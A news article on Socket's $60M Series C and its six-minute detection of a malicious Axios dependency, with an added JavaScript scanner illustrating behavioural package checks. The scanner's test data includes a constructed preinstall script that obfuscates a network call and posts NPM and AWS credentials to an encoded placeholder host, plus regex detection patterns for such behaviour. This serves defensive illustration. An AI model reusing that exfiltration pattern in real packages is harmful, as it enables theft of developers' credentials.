Socket Raises $60M Series C at $1B Valuation After Catching a Malicious Axios Dependency in Six Minutes

Socket has raised $60 million in a Series C funding round at a $1 billion valuation, officially crossing into unicorn territory at a moment when the software supply chain security market is receiving some of the most intense enterprise scrutiny in years. The round was led by Thrive Capital, with participation from Andreessen Horowitz, Abstract Ventures, and Capital One Ventures. Total funding since the company's founding in 2020 now stands at $125 million.
The announcement, dated May 20, comes weeks after one of the most widely discussed open‑source security incidents of the year, an incident in which Socket played a central role in detection.
Six Minutes That Changed the Conversation
When an attacker injected malicious code into a dependency of Axios, the widely used JavaScript HTTP client, the incident exposed something uncomfortable about how most organizations manage open‑source software risk. Axios is downloaded tens of millions of times a week from npm and sits in the dependency trees of a significant share of enterprise web applications. A poisoned version of a package at that scale can propagate into production systems across thousands of companies before any advisory is published.
Socket identified the malicious Axios dependency within six minutes of its publication to the registry and blocked it for its customers before it reached their build and production systems. Within 24 hours of the incident, more than 2,000 organizations had signed up for Socket's platform.
That sequence of events is the most concise version of Socket's sales pitch. Legacy vulnerability scanners match package names and versions against databases of known vulnerabilities. Those databases only list issues that have already been reported and assigned an identifier, so there is an inherent lag between the moment an attacker publishes malicious code and the moment a scanner can flag it. In a world where AI is accelerating how code is written, tested, and deployed, that lag has become commercially unacceptable.
Thrive Capital partner Philip Clark addressed this directly in comments accompanying the round. Legacy tools were designed for an era when there was sufficient time between vulnerability introduction and breach to react to known signatures. That assumption no longer holds when AI can identify and exploit vulnerabilities faster than disclosure cycles can operate.
What Socket Actually Does
Socket was founded in 2020 by Feross Aboukhadijeh, who created WebTorrent, the browser‑based BitTorrent client, and widely used npm packages such as simple-peer and StandardJS, which together reach millions of developers. His experience inside the open‑source ecosystem gave him an unusually detailed understanding of how dependency supply chains work and where the attack surface sits.
The platform analyzes what open‑source packages actually do rather than only matching their names and versions against a vulnerability list. That distinction matters because behavioral analysis can detect:
- Backdoors embedded in new package versions
- Typosquatting attacks where malicious packages are published with names nearly identical to legitimate ones
- Obfuscated code that executes unexpected actions when dependencies are installed
- Dependency confusion attacks that exploit how package managers resolve module names across public and private registries
- Install scripts (preinstall and postinstall hooks) that open network connections or read environment variables, which is where CI tokens and cloud credentials typically live
This kind of analysis happens in real time as packages are published to registries, not after they have already been adopted by developers. The practical result is that Socket's customers receive a block or warning before malicious code enters their codebase, rather than a notification after it already has.
The platform integrates directly into developer workflows through GitHub, GitLab, and IDE extensions, meaning the security review happens at the point where a developer adds or updates a dependency, not in a separate security team queue hours or days later.
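To make the signals listed above concrete, here is an added illustrative scanner (not Socket's code, and not taken from any real package) that applies the same kind of checks to a package's manifest, install-time source and lockfile resolution: lifecycle install hooks, environment access, network calls, base64 decoding, non-literal require(), a typosquat check against popular names, and a dependency-confusion check for private names resolved from the public registry. The sample manifest, files, lock excerpt, popular-name list and private prefix are all constructed for this example; a real scanner would use registry download counts and the organization's actual .npmrc configuration.

```javascript
// Added example: heuristic behavioural checks over an npm package.
// Everything below is constructed for illustration; "axois" and
// "acme-internal-auth" are hypothetical package names.

// Constructed manifest for a fictitious package that typosquats "axios".
const SAMPLE_MANIFEST = {
  name: 'axois',
  version: '1.7.9',
  scripts: { preinstall: 'node ./setup.js' },
  dependencies: { 'acme-internal-auth': '^2.0.0', lodash: '^4.17.21' },
};

// Constructed install script: builds the module name and URL at runtime,
// then posts credentials read from the environment to a remote host.
const SAMPLE_FILES = {
  'setup.js': [
    "const h = require('ht' + 'tps');",
    // The base64 string is a placeholder for an encoded collection URL.
    "const url = Buffer.from('aHR0cHM6Ly9jb2xsZWN0LmV4YW1wbGUuaW52YWxpZC8=', 'base64').toString();",
    'const body = JSON.stringify({ t: process.env.NPM_TOKEN, k: process.env.AWS_SECRET_ACCESS_KEY });',
    "h.request(url, { method: 'POST' }).end(body);",
  ].join('\n'),
};

// Constructed lockfile excerpt: package name -> resolved tarball URL.
const SAMPLE_LOCK = {
  'acme-internal-auth': 'https://registry.npmjs.org/acme-internal-auth/-/acme-internal-auth-2.0.0.tgz',
  lodash: 'https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz',
};

// Assumptions: a short popular-name list (a real scanner would use download
// counts) and the prefix the organization reserves for private packages.
const POPULAR = ['axios', 'lodash', 'express', 'react', 'chalk'];
const PRIVATE_PREFIX = 'acme-internal-';
const PUBLIC_REGISTRY_HOST = 'registry.npmjs.org';

// Source-level signals. "dynamic-require" matches require() whose argument is
// not a single plain string literal, which catches 'ht' + 'tps'.
const SOURCE_SIGNALS = [
  ['env-access', /process\.env\b/, 'reads environment variables'],
  ['network-call', /(?:\bfetch|\.request|\.connect)\s*\(/, 'opens a network connection'],
  ['base64-decode', /Buffer\.from\([^)]*['"]base64['"]\s*\)|\batob\s*\(/, 'decodes base64 at runtime'],
  ['dynamic-require', /\brequire\(\s*(?!['"][^'"]*['"]\s*\))/, 'require() with a non-literal module name'],
  ['eval', /\beval\s*\(|new\s+Function\s*\(/, 'evaluates code from a string'],
];

// Standard single-row Levenshtein edit distance.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = row[j];
      row[j] = Math.min(row[j] + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return row[b.length];
}

// A name within edit distance 2 of a popular package (but not equal to it)
// is treated as a typosquat candidate. Short names will produce false
// positives with this threshold; a real check would weight by length.
function findTyposquat(name) {
  for (const popular of POPULAR) {
    const d = levenshtein(name, popular);
    if (d > 0 && d <= 2) return popular;
  }
  return null;
}

function scanPackage(manifest, files, lock) {
  const findings = [];
  const target = findTyposquat(manifest.name);
  if (target) findings.push({ id: 'typosquat', detail: `${manifest.name} resembles ${target}` });
  for (const hook of ['preinstall', 'install', 'postinstall']) {
    if (manifest.scripts && manifest.scripts[hook]) {
      findings.push({ id: 'install-script', detail: `${hook}: ${manifest.scripts[hook]}` });
    }
  }
  for (const [path, src] of Object.entries(files)) {
    for (const [id, re, desc] of SOURCE_SIGNALS) {
      if (re.test(src)) findings.push({ id, detail: `${path} ${desc}` });
    }
  }
  // Dependency confusion: a private-prefixed name that the lockfile resolved
  // from the public registry means the public copy won the resolution.
  for (const dep of Object.keys(manifest.dependencies || {})) {
    const resolved = lock[dep];
    if (dep.startsWith(PRIVATE_PREFIX) && resolved && new URL(resolved).host === PUBLIC_REGISTRY_HOST) {
      findings.push({ id: 'dependency-confusion', detail: `${dep} resolved from ${PUBLIC_REGISTRY_HOST}` });
    }
  }
  return findings;
}

// Policy applied at the point of install: any finding blocks. A production
// policy would weight signals and allow reviewed exceptions.
function shouldBlock(findings) { return findings.length > 0; }

const BENIGN_MANIFEST = { name: 'lodash', version: '4.17.21', dependencies: {} };

const SAMPLE_FINDINGS = scanPackage(SAMPLE_MANIFEST, SAMPLE_FILES, SAMPLE_LOCK);
for (const f of SAMPLE_FINDINGS) console.log(`${f.id}: ${f.detail}`);
console.log('block:', shouldBlock(SAMPLE_FINDINGS));
```

The point of the example is the ordering of checks rather than the regexes themselves: every signal is evaluated on the package contents at publish or install time, not on a vulnerability identifier, so a brand-new malicious version is caught by what it does even though no advisory exists for it yet.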
Who Is Using It
Socket's customer list reflects the concentration of sophisticated engineering organizations that both contribute to and depend on open‑source software at scale.
Named customers include Anthropic, xAI, Replit, Cursor, Figma, Vercel, Gusto, Mercado Libre, and Cribl, alongside Fortune 100 companies in financial services and global media. That roster covers the organizations building the AI tools developers use (Anthropic, xAI), the platforms developers build on (Vercel, Replit), and the tools developers use every day (Figma, Cursor). These are not peripheral adopters of open‑source software. They are organizations whose products are substantially built from it.
Notably, Socket was named to the Rising in Cyber 2026 list, a recognition selected by CISOs and senior security executives identifying the 30 most significant private cybersecurity startups operating today. That peer‑level endorsement from the buyer community is a different signal from investor backing, and in enterprise security it carries meaningful weight in procurement conversations.
The Market Behind the Round
The software supply chain attack surface has expanded significantly over the past three years alongside the growth of AI‑assisted development. AI coding tools help engineers ship code faster, and a large portion of that code relies on open‑source packages pulled from external registries. More packages, more frequent updates, faster deployment cycles, and more developers working with AI assistance mean the volume of unvetted external code entering enterprise production environments has grown substantially.
Socket competes in this space against Snyk, Checkmarx, Sonatype, and GitHub's own security scanning tools, all of which have existing enterprise relationships and significant capital behind them. Socket's argument is not that those tools are bad. It is that they were architecturally designed for a threat model that predates the current reality, in which attackers publish malicious packages and versions rather than exploit known vulnerabilities in existing ones.
The $60 million Series C will support the company's next phase of growth as enterprise adoption accelerates across financial services, technology, and media organizations managing complex open‑source dependency graphs. The company has not disclosed revenue figures, but the customer list and the caliber of the investor group suggest the commercial traction is substantial.